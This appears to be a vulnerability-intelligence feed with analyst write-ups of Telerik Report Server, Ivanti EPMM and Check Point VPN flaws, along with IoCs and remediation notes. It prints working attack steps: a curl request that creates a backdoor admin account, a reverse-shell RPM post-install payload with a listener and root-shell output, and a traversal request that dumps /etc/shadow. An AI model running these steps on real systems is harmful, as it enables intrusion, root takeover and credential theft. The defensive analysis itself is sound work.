Activity Feed

Indicated source as
  • Other: Rapid7 MDR has seen successful exploitation of customer environments
Indicated source as
  • Personally observed in an environment
3
Ratings
Technical Analysis

So far, 2024 has seen a few notable vulnerabilities, such as CVE-2024-1709, that attack setup wizard flows for authentication bypass. This vulnerability, discovered by researcher Sina Kheirkhah, falls into the same group. By exploiting an access control vulnerability in the administrator setup wizard, unauthenticated attackers gain high-privileged access to Telerik Report Server. With the newly-acquired administrator account, another new Report Server vulnerability, tracked as CVE-2024-1800, can be leveraged for remote code execution on the host system.

Exploitation

The initial administrator setup code in Telerik.ReportServer.Web.dll!Telerik.ReportServer.Web.Controllers.StartupController.Register does not check if setup has already been completed. As a result, the attacker can manually perform the web request to create a new administrator account. Per Sina’s public proof of concept, the authentication bypass vulnerability can be exploited with a single request:
curl 'http://TARGET_HERE/Startup/Register' -d 'Username=USERNAME_HERE&Password=PASSWORD_HERE&ConfirmPassword=PASSWORD_HERE&Email=backdoor%40admin.com&FirstName=backdoor&LastName=user'

Public Exposure

It’s worth mentioning that Shodan only appears to return a few hundred public-facing Telerik Report Server instances. However, due to the unauthenticated RCE impact, organizations running the Report Server would be wise to patch with urgency. The Progress Knowledge Base contains guidance on how to remediate this vulnerability.

2
Ratings
Technical Analysis

Ivanti EPMM (previously known as MobileIron Core) is vulnerable to a local privilege escalation vulnerability. The install command accessible from the MobileIron CORE CLI or Ivanti EPMM CLI allows privileged CLI users to install .rpm packages. Affected versions are versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1.

The install command fails to enforce signature verification or URL filtering of any sort when installing rpm from url allowing an attacker to host a malicious rpm package and have their victim download and install it with root privileges.

There exists an install binary on the on the affected appliance – please note that it is unrelated to the install command accessible from the CLI which is vulnerable to the priv esc:

which install
/bin/install
install --help
Usage: install [OPTION]... [-T] SOURCE DEST
  or:  install [OPTION]... SOURCE... DIRECTORY
  or:  install [OPTION]... -t DIRECTORY SOURCE...
  or:  install [OPTION]... -d DIRECTORY...

This install program copies files (often just compiled) into destination
locations you choose.  If you want to download and install a ready-to-use
package on a GNU/Linux system, you should instead be using a package manager
like yum(1) or apt-get(1).

To access the vulnerable command, one must first gain CLI access via SSH or physical access

➜ ssh msfuser@172.16.199.40
msfuser@172.16.199.40's password:
Last login: Mon Jun  3 14:12:12 2024 from 172.16.199.1
************************************************************
*                   MobileIron CORE CLI                    *
*                                                          *
*                                                          *
************************************************************
Welcome msfuser it is Mon Jun 3 15:00:14 UTC 2024
CORE(11.2.0.0-31)@lobster.example.com>

  enable      Turn on privileged commands
  exit        Exit from the EXEC
  help        Description of the interactive help system
  host        Query Internet name servers
  logout      Exit from the EXEC
  ping        Send echo messages
  show        Show running system information
  speedtest   Performs speed test for disk memory and cpu
  timeout     CLI Idle timeout.
  traceroute  Trace route to destination

Then turn on privileged commands with enable followed by the correct Admin CLI password:

CORE(11.2.0.0-31)@lobster.example.com> enable
Password:
CORE(11.2.0.0-31)@lobster.example.com#install

  rpm  Gets the rpm and install. choose any from: cdrom file info url

CORE(11.2.0.0-31)@lobster.example.com#install rpm

  cdrom  Gets the rpm and install from cdrom
  file   Get and show the rpm(s) from the given file path and installs
  info   Gets list of rpms installed
  url    Gets the rpm and install from the given url

As outlined by securekomodo in the following blog post the CLI command install is really just a wrapper for the command:

/bin/rpm -Uvh *.rpm

Which will get run as root, allowing an attacker to host a malicious RPM package, install it and successfully escalate privileges.

Example PoC

Create a postinstall.sh script that will run as root after the .rpm package gets installed. Include your payload.

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ cat postinstall.sh
#!/bin/sh
bash -i >& /dev/tcp/172.16.199.131/443 0>&1
exit 0

Create the malicious .rpm package using the Ruby gem fpm:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ fpm -s dir -t rpm -n test-poc -v 2.0 -a i386 --description "MobileIron Reverse Shell" --maintainer "msfuser" --after-install postinstall.sh -C .
Created package {:path=>"test-poc-2.0-1.i386.rpm"}

Host the .rpm package via a Python HTTP server:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo python3 -m http.server 80
[sudo] password for msfuser:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Start a nc listener on our attacking machine:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo nc -l 443
[sudo] password for msfuser:

As previously demonstrated SSH to the vulnerable appliance or physically access theMobile Iron Core / Ivanti EPMM CLI and type enable followed by the Admin password in order to enable privileged commands. Once successfully authenticated use the vulnerable command to download and install the .rpm in the context of the root user.

CORE(11.2.0.0-31)@lobster.example.com#install rpm url http://172.16.199.131/test-poc-2.0-1.i386.rpm
--2024-06-03 16:04:48--  http://172.16.199.131/test-poc-2.0-1.i386.rpm
Connecting to 172.16.199.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49796 (49K) [application/x-redhat-package-manager]
Saving to: 'test-poc-2.0-1.i386.rpm'

100%[====================================================================================================================================================================================================================>] 49,796      --.-K/s   in 0.001s

2024-06-03 16:04:48 (32.7 MB/s) - 'test-poc-2.0-1.i386.rpm' saved [49796/49796]

Preparing...                          ################################# [100%]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   469  100   469    0     0   279k      0 --:--:-- --:--:-- --:--:--  458k
Updating / installing...
   1:test-poc-2.0-1                   ################################# [100%]

Check the nc listener and see that we’ve received a shell running in the context of the root user.

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo nc -l 443
[sudo] password for msfuser:
[root@lobster.example.com 2024-06-03--16-30-57 / #] id
id
uid=0(root) gid=0(root) groups=0(root)
[root@lobster.example.com 2024-06-03--16-42-52 / #] uname -a
uname -a
Linux lobster.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

To reset the target in order to retest, simply remove the package you just installed with:

CORE(11.2.0.0-31)@lobster.example.com#no install rpm test-poc-2.0-1.i386
Uninstalled  ivanti-privesc-13.37-1.i386 successfully.

IoCs

Unprivileged users can query logs from the Mobile Iron / Ivanti EPMM CLI. One way users can check for IoCs in by issuing the following command:

CORE(11.2.0.0-31)@lobster.example.com> show log messages
--log 'messages' --

The above command will allow the user to access /var/log/messages via the CLI. The below isn’t indicative of a successful exploit attempt, the following log lines will be present on a device where the user has installed malicious or trusted RPM packages using the CLI.

Jun  3 16:51:51 lobster installTools: Command: /bin/rpm -Uvh *.rpm successful
Jun  3 16:51:51 lobster installTools: Command: /bin/ls *.rpm  >> /mi/files/installedTools successful
Jun  3 16:51:52 lobster installTools: Command: /bin/rm * >& /dev/null successful
Jun  3 16:51:52 lobster installTools: Command: popd >& /dev/null successful
Jun  3 16:51:52 lobster installTools: RPM downloaded and installed successfully

Interestingly enough, it doesn’t seem this command completes successfully, despite it saying that it does. There is no reference to our malicious .rpm file in the file /mi/files/installedTools

Jun  3 16:51:51 lobster installTools: Command: /bin/ls *.rpm  >> /mi/files/installedTools successful

It gets created but is zero bytes:

[root@lobster.example.com 2024-06-03--17-31-48 files #] ls -l /mi/files/installedTools
ls -l /mi/files/installedTools
-rw-r--r-- 1 root root 0 Jun  3 17:27 /mi/files/installedTools

Also one can look at the current processes for tell tale signs of successful exploitation by running:

[root@lobster.example.com 2024-06-03--17-35-43 files #] ps aux
ps aux
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
...
root      63342  0.0  0.0 137500  5536 pts/0    S    17:27   0:00 /usr/bin/sudo /mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm
root      63345  0.0  0.0   9700  1584 pts/0    S    17:27   0:00 /bin/bash /mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm
root      63407  0.0  0.1  78976 10308 pts/0    S    17:27   0:00 /bin/rpm -Uvh test-poc-2.0-1.i386.rpm
root      63408  0.0  0.0   9564  1124 pts/0    S    17:27   0:00 /bin/sh /var/tmp/rpm-tmp.D6MXUG 1
root      63409  0.0  0.0 116004  2684 pts/0    S    17:27   0:00 bash -i

We can see that processes that were spawned in order to download and install our malicious rpm are still running.
If we get the PID from the reverse shell we confirm 63409 in the above is our reverse shell and the sink of our exploit.

[root@lobster.example.com 2024-06-03--17-37-12 files #] echo "My PID is $$"
echo "My PID is $$"
My PID is 63409

If we run the following we can get a bit more detail of the context of the root process spawned when this is exploited:

[root@lobster.example.com 2024-06-03--17-58-29 var #] ps auxe | grep 63409
ps auxe | grep 63409
root      63409  0.0  0.0 116004  2704 pts/0    S    17:27   0:00 bash -i XDG_SESSION_ID=2903 MI_DATE_FORMAT=%Y-%m-%d--%H-%M-%S TERM=xterm-256color SHELL=/bin/bash MI_DATE_COMMAND=date +%Y-%m-%d--%H-%M-%S USER=root SUDO_USER=msfuser SUDO_UID=2002 USERNAME=root RPM_INSTALL_PREFIX0=/ MAIL=/var/mail/root PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin _=/bin/bash PWD=/ JAVA_HOME=/usr/java/default HOME=/root SUDO_COMMAND=/mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm SHLVL=2 RPM_INSTALL_PREFIX=/ LOGNAME=root SUDO_GID=1001

Attacker Value and Exploitability Rating

I gave this vulnerability an attacker rating of 1/5 mainly due to the fact authentication to the CLI is required as well as the CLI Admin password in order to enable privileged commands to access the vulnerable command install.

Once the necessary credentials are obtained exploitation is straightforward: host the malicious package for the victim to download and install, then profit. However the need for such high credentials makes this vulnerability difficult to exploit in the real world.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This is trivial to exploit. The vulnerability at its core is a directory traversal vulnerability that allows for full access to files on the Check Point VPN device/service. It also appears that this an unauthenticated vulnerability and given that these servers will by their very nature be publicly exposed, significantly increases the risk of this vulnerability.

Exploit

The exploit itself, as mentioned above is trivial to exploit. An example is shown on https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/:

Request

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Response

HTTP/1.0 200 OK
Date: Thu, 30 May 2024 01:38:29 GMT
Server: Check Point SVN foundation
Content-Type: text/html
X-UA-Compatible: IE=EmulateIE7
Connection: close
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 505

admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::

Using this, an attacker would be able to gain access to sensitive data on the server, such as the configuration for the VPN service.

Indicated source as
  • News Article or Blog